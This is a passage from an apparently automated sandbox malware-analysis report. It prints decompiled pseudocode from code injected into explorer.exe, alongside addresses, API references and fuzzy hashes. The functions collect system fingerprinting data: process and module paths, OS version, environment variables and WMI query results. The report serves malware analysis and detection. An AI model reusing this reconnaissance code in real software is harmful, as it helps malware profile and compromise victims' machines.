				_t17 = _t5;
				if(_t17 != 0) {
					_t6 = E0008A65C(_t17, _a8, _a12); // executed
					if(_t6 != 0) {
						CloseHandle(_t17);
						return 0;
					}
					_t10 = 0xfffffffe;
					return _t10;
				}
				return _t5 | 0xffffffff;
			}








                  0x0008a786
                  0x0008a787
                  0x0008a78c
                  0x0008a790
                  0x0008a79f
                  0x0008a7a7
                  0x0008a7b4
                  0x00000000
                  0x0008a7b7
                  0x0008a7ab
                  0x00000000
                  0x0008a7ab
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 40f16143bd56816ec1f8bb97132b8114a443b5728d7a5c4d9aecef28d1fc0aa7
                  • Instruction ID: 663aae789e914c9616d0efe74e5f130c4bdd51193654dc020258e593981ed1c8
                  • Opcode Fuzzy Hash: 40f16143bd56816ec1f8bb97132b8114a443b5728d7a5c4d9aecef28d1fc0aa7
                  • Instruction Fuzzy Hash: 14E02236308A256BAB217A689C5099E37A4BF0A7707200213F9658BAC2DA30D84193D2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 000898A6, Relevance: 1.3, APIs: 1, Instructions: 27COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E000898A6(void* __eflags, intOrPtr _a4) {
				intOrPtr _t24;

				_t24 = _a4;
				if(E0008A4BF( *(_t24 + 0x1c), 0x3a98) >= 0) {
					CloseHandle( *(_t24 + 0x1c));
					 *((intOrPtr*)(_t24 + 0x18)) =  *((intOrPtr*)(_t24 + 8))( *((intOrPtr*)(_t24 + 0xc)));
					if(( *(_t24 + 0x14) & 0x00000001) == 0) {
						E0008984A(_t24, 1);
					}
					return  *((intOrPtr*)(_t24 + 0x18));
				}
				return 0;
			}




                  0x000898aa
                  0x000898bc
                  0x000898ca
                  0x000898d7
                  0x000898da
                  0x000898e1
                  0x000898e1
                  0x00000000
                  0x000898e6
                  0x00000000

                  APIs
                  • CloseHandle.KERNELBASE(?), ref: 000898CA
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CloseHandle
                  • String ID:
                  • API String ID: 2962429428-0
                  • Opcode ID: 5ef8d3bc2a1d0954a875872caaf3ef1d034ba8ea9ac2313de69fc76a64cb86ef
                  • Instruction ID: b32fbe6ba74ab13a60de709608ce14b267378680ed387debe1417f5410f660e5
                  • Opcode Fuzzy Hash: 5ef8d3bc2a1d0954a875872caaf3ef1d034ba8ea9ac2313de69fc76a64cb86ef
                  • Instruction Fuzzy Hash: C0F0A031300702DBC720BF62E80496BBBE9FF563507048829E5C687962DB71F8019790
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008B337, Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                  Download Yara Rule
                  C-Code - Quality: 89%
                  			E0008B337(void* __ecx) {
				intOrPtr _t4;
				void* _t5;
				intOrPtr _t6;
				void* _t12;
				void* _t13;

				_t4 =  *0x9e684; // 0x40f8f0
				_t13 = 0;
				_t5 =  *((intOrPtr*)(_t4 + 0xbc))(2, 0, __ecx);
				_t12 = _t5;
				if(_t12 != 0) {
					_t6 =  *0x9e684; // 0x40f8f0
					_push(_t12);
					if( *((intOrPtr*)(_t6 + 0xc0))() != 0) {
						_t13 = 1;
					}
					CloseHandle(_t12);
					return _t13;
				}
				return _t5;
			}








                  0x0008b337
                  0x0008b33f
                  0x0008b344
                  0x0008b34a
                  0x0008b34e
                  0x0008b350
                  0x0008b355
                  0x0008b35e
                  0x0008b362
                  0x0008b362
                  0x0008b36a
                  0x00000000
                  0x0008b36d
                  0x0008b371

                  APIs
                  • CloseHandle.KERNELBASE(00000000,?,00000000,00083C8A,?,?,?,?,?,?,?,?,00083D6F,00000000), ref: 0008B36A
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CloseHandle
                  • String ID:
                  • API String ID: 2962429428-0
                  • Opcode ID: 1aa3408248094b525e3aa245139550e6978348c105a51532174060b81b91920c
                  • Instruction ID: 8fe01f62ba4c39ee7338d5a8f0e8a0c9642a3c10550f89b54f48b15bd4262c2d
                  • Opcode Fuzzy Hash: 1aa3408248094b525e3aa245139550e6978348c105a51532174060b81b91920c
                  • Instruction Fuzzy Hash: 15E04F33300120ABD6609B69EC4CF677BA9FBA6A91F060169F905C7111CB248C02C7A1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  Function 0008D01F, Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 282COMMON
                  Download Yara Rule
                  C-Code - Quality: 86%
                  			E0008D01F(void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				struct _SYSTEM_INFO _v52;
				char _v180;
				char _v692;
				char _v704;
				char _v2680;
				void* __esi;
				struct _OSVERSIONINFOA* _t81;
				intOrPtr _t83;
				void* _t84;
				long _t86;
				intOrPtr* _t88;
				intOrPtr _t90;
				intOrPtr _t95;
				intOrPtr _t97;
				void* _t98;
				intOrPtr _t103;
				char* _t105;
				void* _t108;
				char _t115;
				signed int _t117;
				char _t119;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t147;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				signed int _t159;
				struct HINSTANCE__* _t162;
				short* _t164;
				intOrPtr _t167;
				WCHAR* _t168;
				char* _t169;
				intOrPtr _t181;
				intOrPtr _t200;
				void* _t215;
				char _t218;
				void* _t219;
				char* _t220;
				struct _OSVERSIONINFOA* _t222;
				void* _t223;
				int* _t224;
				void* _t241;

				_t241 = __fp0;
				_t162 =  *0x9e69c; // 0x10000000
				_t81 = E00088604(0x1ac4);
				_t222 = _t81;
				if(_t222 == 0) {
					return _t81;
				}
				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
				_t83 =  *0x9e684; // 0x40f8f0
				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
				_t3 = _t222 + 0x648; // 0x648
				E00092301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
				_t5 = _t222 + 0x1644; // 0x1644
				_t216 = _t5;
				_t86 = GetModuleFileNameW(0, _t5, 0x105);
				_t227 = _t86;
				if(_t86 != 0) {
					 *((intOrPtr*)(_t222 + 0x1854)) = E00088FBE(_t216, _t227);
				}
				GetCurrentProcess();
				_t88 = E0008BA05();
				 *((intOrPtr*)(_t222 + 0x110)) = _t88;
				_t178 =  *_t88;
				if(E0008BB8D( *_t88) == 0) {
					_t90 = E0008BA62(_t178, _t222);
					__eflags = _t90;
					_t181 = (0 | _t90 > 0x00000000) + 1;
					__eflags = _t181;
					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
				} else {
					 *((intOrPtr*)(_t222 + 0x214)) = 3;
				}
				_t12 = _t222 + 0x220; // 0x220
				 *((intOrPtr*)(_t222 + 0x218)) = E0008E3F1(_t12);
				 *((intOrPtr*)(_t222 + 0x21c)) = E0008E3B6(_t12);
				_push( &_v16);
				 *(_t222 + 0x224) = _t162;
				_push( &_v8);
				_v12 = 0x80;
				_push( &_v692);
				_v8 = 0x100;
				_push( &_v12);
				_t22 = _t222 + 0x114; // 0x114
				_push( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x110)))));
				_t95 =  *0x9e68c; // 0x40fab8
				_push(0);
				if( *((intOrPtr*)(_t95 + 0x6c))() == 0) {
					GetLastError();
				}
				_t97 =  *0x9e694; // 0x40fa48
				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
				_t26 = _t222 + 0x228; // 0x228
				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
				GetLastError();
				_t31 = _t222 + 0x228; // 0x228
				 *((intOrPtr*)(_t222 + 0x434)) = E00088FBE(_t31, _t98);
				_t34 = _t222 + 0x114; // 0x114
				_t103 = E0008B7A8(_t34,  &_v692);
				_t35 = _t222 + 0xb0; // 0xb0
				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
				_push(_t35);
				E0008B67D(_t103, _t35, _t98, _t241);
				_t37 = _t222 + 0xb0; // 0xb0
				_t105 = _t37;
				_t38 = _t222 + 0xd0; // 0xd0
				_t164 = _t38;
				if(_t105 != 0) {
					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
					if(_t159 > 0) {
						_t164[_t159] = 0;
					}
				}
				_t41 = _t222 + 0x438; // 0x438
				_t42 = _t222 + 0x228; // 0x228
				E00088FD8(_t42, _t41);
				_t43 = _t222 + 0xb0; // 0xb0
				_t108 = E0008D400(_t43, E0008C379(_t43), 0);
				_t44 = _t222 + 0x100c; // 0x100c
				E0008B88A(_t108, _t44, _t241);
				_t199 = GetCurrentProcess();
				 *((intOrPtr*)(_t222 + 0x101c)) = E0008BBDF(_t110);
				memset(_t222, 0, 0x9c);
				_t224 = _t223 + 0xc;
				_t222->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t222);
				_t167 =  *0x9e684; // 0x40f8f0
				_t115 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
					_t115 = _v8;
				}
				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
				if(_t115 == 0) {
					GetSystemInfo( &_v52);
					_t117 = _v52.dwOemId & 0x0000ffff;
				} else {
					_t117 = 9;
				}
				_t54 = _t222 + 0x1020; // 0x1020
				_t168 = _t54;
				 *(_t222 + 0x9c) = _t117;
				GetWindowsDirectoryW(_t168, 0x104);
				_t119 = E000895E1(_t199, 0x10c);
				_t200 =  *0x9e684; // 0x40f8f0
				_t218 = _t119;
				 *_t224 = 0x104;
				_push( &_v704);
				_push(_t218);
				_v8 = _t218;
				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
					_t154 =  *0x9e684; // 0x40f8f0
					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
				}
				E000885D5( &_v8);
				_t124 =  *0x9e684; // 0x40f8f0
				_t61 = _t222 + 0x1434; // 0x1434
				_t219 = _t61;
				 *_t224 = 0x209;
				_push(_t219);
				_push(L"USERPROFILE");
				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
					E00089640(_t219, 0x105, L"%s\\%s", _t168);
					_t152 =  *0x9e684; // 0x40f8f0
					_t224 =  &(_t224[5]);
					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
				}
				_push(0x20a);
				_t64 = _t222 + 0x122a; // 0x122a
				_t169 = L"TEMP";
				_t127 =  *0x9e684; // 0x40f8f0
				_push(_t169);
				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
					_t149 =  *0x9e684; // 0x40f8f0
					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
				}
				_push(0x40);
				_t220 = L"SystemDrive";
				_push( &_v180);
				_t130 =  *0x9e684; // 0x40f8f0
				_push(_t220);
				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
					_t147 =  *0x9e684; // 0x40f8f0
					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
				}
				_v8 = 0x7f;
				_t72 = _t222 + 0x199c; // 0x199c
				_t134 =  *0x9e684; // 0x40f8f0
				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
				_t75 = _t222 + 0x100c; // 0x100c
				E00092301(E0008D400(_t75, E0008C379(_t75), 0),  &_v2680);
				_t76 = _t222 + 0x1858; // 0x1858
				E000922D3( &_v2680, _t76, 0x20);
				_t79 = _t222 + 0x1878; // 0x1878
				E0008902D(1, _t79, 0x14, 0x1e,  &_v2680);
				 *((intOrPtr*)(_t222 + 0x1898)) = E0008CD33(_t79);
				return _t222;
			}



















































                  0x0008d01f
                  0x0008d029
                  0x0008d035
                  0x0008d03a
                  0x0008d03f
                  0x0008d3ff
                  0x0008d3ff
                  0x0008d04c
                  0x0008d052
                  0x0008d057
                  0x0008d05d
                  0x0008d06d
                  0x0008d079
                  0x0008d079
                  0x0008d082
                  0x0008d088
                  0x0008d08a
                  0x0008d093
                  0x0008d093
                  0x0008d09f
                  0x0008d0a3
                  0x0008d0a8
                  0x0008d0ae
                  0x0008d0b7
                  0x0008d0c5
                  0x0008d0cc
                  0x0008d0d1
                  0x0008d0d1
                  0x0008d0d2
                  0x0008d0b9
                  0x0008d0b9
                  0x0008d0b9
                  0x0008d0d8
                  0x0008d0e3
                  0x0008d0f1
                  0x0008d0f7
                  0x0008d0fb
                  0x0008d101
                  0x0008d108
                  0x0008d10f
                  0x0008d113
                  0x0008d11a
                  0x0008d11b
                  0x0008d128
                  0x0008d12a
                  0x0008d12f
                  0x0008d13c
                  0x0008d13e
                  0x0008d13e
                  0x0008d140
                  0x0008d14a
                  0x0008d156
                  0x0008d166
                  0x0008d16c
                  0x0008d172
                  0x0008d174
                  0x0008d185
                  0x0008d18b
                  0x0008d191
                  0x0008d196
                  0x0008d19c
                  0x0008d1a2
                  0x0008d1a7
                  0x0008d1ac
                  0x0008d1ac
                  0x0008d1b2
                  0x0008d1b2
                  0x0008d1bb
                  0x0008d1c7
                  0x0008d1cf
                  0x0008d1d3
                  0x0008d1d3
                  0x0008d1cf
                  0x0008d1d7
                  0x0008d1dd
                  0x0008d1e3
                  0x0008d1ea
                  0x0008d1fb
                  0x0008d201
                  0x0008d209
                  0x0008d210
                  0x0008d223
                  0x0008d229
                  0x0008d22e
                  0x0008d231
                  0x0008d234
                  0x0008d23a
                  0x0008d240
                  0x0008d242
                  0x0008d248
                  0x0008d251
                  0x0008d254
                  0x0008d254
                  0x0008d257
                  0x0008d25f
                  0x0008d26a
                  0x0008d270
                  0x0008d261
                  0x0008d263
                  0x0008d263
                  0x0008d279
                  0x0008d279
                  0x0008d27f
                  0x0008d287
                  0x0008d292
                  0x0008d297
                  0x0008d29d
                  0x0008d29f
                  0x0008d2ac
                  0x0008d2ad
                  0x0008d2ae
                  0x0008d2b9
                  0x0008d2bb
                  0x0008d2c2
                  0x0008d2c2
                  0x0008d2cc
                  0x0008d2d1
                  0x0008d2d6
                  0x0008d2d6
                  0x0008d2dc
                  0x0008d2e3
                  0x0008d2e4
                  0x0008d2f1
                  0x0008d304
                  0x0008d309
                  0x0008d30e
                  0x0008d317
                  0x0008d317
                  0x0008d31d
                  0x0008d322
                  0x0008d328
                  0x0008d32e
                  0x0008d333
                  0x0008d33c
                  0x0008d33e
                  0x0008d345
                  0x0008d345
                  0x0008d34b
                  0x0008d353
                  0x0008d358
                  0x0008d359
                  0x0008d35e
                  0x0008d367
                  0x0008d369
                  0x0008d374
                  0x0008d374
                  0x0008d37d
                  0x0008d385
                  0x0008d38c
                  0x0008d391
                  0x0008d3a0
                  0x0008d3b8
                  0x0008d3bf
                  0x0008d3cd
                  0x0008d3df
                  0x0008d3e6
                  0x0008d3f3
                  0x00000000

                  APIs
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • GetCurrentProcessId.KERNEL32 ref: 0008D046
                  • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 0008D082
                  • GetCurrentProcess.KERNEL32 ref: 0008D09F
                  • GetLastError.KERNEL32 ref: 0008D13E
                  • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 0008D16C
                  • GetLastError.KERNEL32 ref: 0008D172
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 0008D1C7
                  • GetCurrentProcess.KERNEL32 ref: 0008D20E
                  • memset.MSVCRT ref: 0008D229
                  • GetVersionExA.KERNEL32(00000000), ref: 0008D234
                  • GetCurrentProcess.KERNEL32(00000100), ref: 0008D24E
                  • GetSystemInfo.KERNEL32(?), ref: 0008D26A
                  • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 0008D287
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CurrentProcess$ErrorFileLastModuleName$AllocateByteCharDirectoryHeapInfoMultiSystemVersionWideWindowsmemset
                  • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                  • API String ID: 3876402152-2706916422
                  • Opcode ID: 12dfeda50fcfa05c5d9c49e5a909d2d4da4cbeaac424930ed5d12b2800c1f241
                  • Instruction ID: 25e8395d91437c6831676a43eef48ae52fba165dceb8ee9639bfc079f816c02c
                  • Opcode Fuzzy Hash: 12dfeda50fcfa05c5d9c49e5a909d2d4da4cbeaac424930ed5d12b2800c1f241
                  • Instruction Fuzzy Hash: 77B16071600704AFE750EB70DD89FEA77E8BF58300F00456AF59AD7292EB74AA04CB21
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008DB3C, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388memoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 50%
                  			E0008DB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E0008D523(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E00088604(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E0008861A( &_v60, 0xfffffffe);
					E0008D5D7( &_v104);
					return _t320;
				}
				_t165 = E000895E1(_t255, 0x536);
				 *_t328 = 0x609;
				_v52 = _t165;
				_t166 = E000895E1(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E000892E5(_t165);
				_v60 = _t322;
				E000885D5( &_v52);
				E000885D5( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E000895E1(_t255, 0x9e4);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E000885D5( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E0008861A( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E000891E3(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E000891E3(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E00088698(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E00088604( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E0008861A(_t136, 0);
								E0008861A( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E000891E3(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E000895E1(_t281, 0x250);
								 *_t329 = 0x4cc;
								_t217 = E000895E1(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00088604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E000885D5( &_v92);
											E000885D5( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E00089640();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00088604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E000895E1(_t283, 0x219);
										E00089640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E000885D5( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E000891E3(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E0008DA20( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E0008861A( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}





































































                  0x0008db45
                  0x0008db4b
                  0x0008db52
                  0x0008db55
                  0x0008db58
                  0x0008db5d
                  0x0008db5f
                  0x0008db64
                  0x0008dfac
                  0x0008dfac
                  0x0008db71
                  0x0008db73
                  0x0008db76
                  0x0008db79
                  0x0008df91
                  0x0008df97
                  0x0008dfa1
                  0x00000000
                  0x0008dfa6
                  0x0008db84
                  0x0008db8b
                  0x0008db92
                  0x0008db95
                  0x0008db9a
                  0x0008db9c
                  0x0008db9f
                  0x0008dba2
                  0x0008dba3
                  0x0008dbac
                  0x0008dbb2
                  0x0008dbb5
                  0x0008dbbe
                  0x0008dbc3
                  0x0008dbc8
                  0x0008dbdf
                  0x0008dbec
                  0x0008dbef
                  0x0008dbf6
                  0x0008dbfb
                  0x0008dc02
                  0x0008dc07
                  0x0008dc0e
                  0x0008dc10
                  0x0008dc1c
                  0x0008dc1f
                  0x0008dc21
                  0x0008df81
                  0x0008df82
                  0x0008df8b
                  0x00000000
                  0x0008df8b
                  0x0008dc27
                  0x0008dc2a
                  0x0008dc2d
                  0x0008dc30
                  0x0008dc32
                  0x0008df4d
                  0x0008df50
                  0x0008df53
                  0x0008df55
                  0x0008df77
                  0x0008df7c
                  0x0008df57
                  0x0008df5a
                  0x0008df65
                  0x0008df6c
                  0x0008df6c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0008dc38
                  0x0008dc38
                  0x0008dc4a
                  0x0008dc4d
                  0x0008dc4f
                  0x00000000
                  0x00000000
                  0x0008dc57
                  0x0008dc5a
                  0x0008dc5d
                  0x0008dc60
                  0x0008dc63
                  0x0008dc66
                  0x00000000
                  0x00000000
                  0x0008dc6c
                  0x0008dc7a
                  0x0008dc7d
                  0x0008dc7f
                  0x0008dc98
                  0x0008dca7
                  0x0008dcaf
                  0x0008dcaf
                  0x0008dcb2
                  0x0008dcb9
                  0x0008dcbd
                  0x0008dcc3
                  0x0008dcc5
                  0x0008df35
                  0x0008df3b
                  0x0008df41
                  0x0008df44
                  0x0008df44
                  0x00000000
                  0x0008df44
                  0x0008dcd4
                  0x0008dce8
                  0x0008dcec
                  0x0008dcee
                  0x0008dcf3
                  0x0008df02
                  0x0008df08
                  0x0008df13
                  0x0008df1e
                  0x0008df24
                  0x0008df2a
                  0x0008df2d
                  0x00000000
                  0x0008df2d
                  0x0008dcf9
                  0x0008ded0
                  0x0008ded0
                  0x0008ded3
                  0x0008ded6
                  0x00000000
                  0x00000000
                  0x0008dd01
                  0x0008dd09
                  0x0008dd10
                  0x0008dd16
                  0x0008dd18
                  0x00000000
                  0x00000000
                  0x0008dd21
                  0x0008dd36
                  0x0008dd3c
                  0x0008dd45
                  0x0008dd48
                  0x0008dd4b
                  0x0008dd4d
                  0x0008dec3
                  0x0008dec6
                  0x0008decf
                  0x0008decf
                  0x00000000
                  0x0008decf
                  0x0008dd5d
                  0x0008dd60
                  0x0008dd67
                  0x0008dd6d
                  0x0008dd70
                  0x0008dd73
                  0x0008dd76
                  0x0008dd79
                  0x0008ddb5
                  0x0008ddb5
                  0x0008ddb8
                  0x0008de64
                  0x0008de78
                  0x0008de88
                  0x0008de8c
                  0x0008de8e
                  0x0008dea5
                  0x0008dea9
                  0x0008deb2
                  0x0008debd
                  0x00000000
                  0x0008debd
                  0x0008de94
                  0x0008de95
                  0x0008de9a
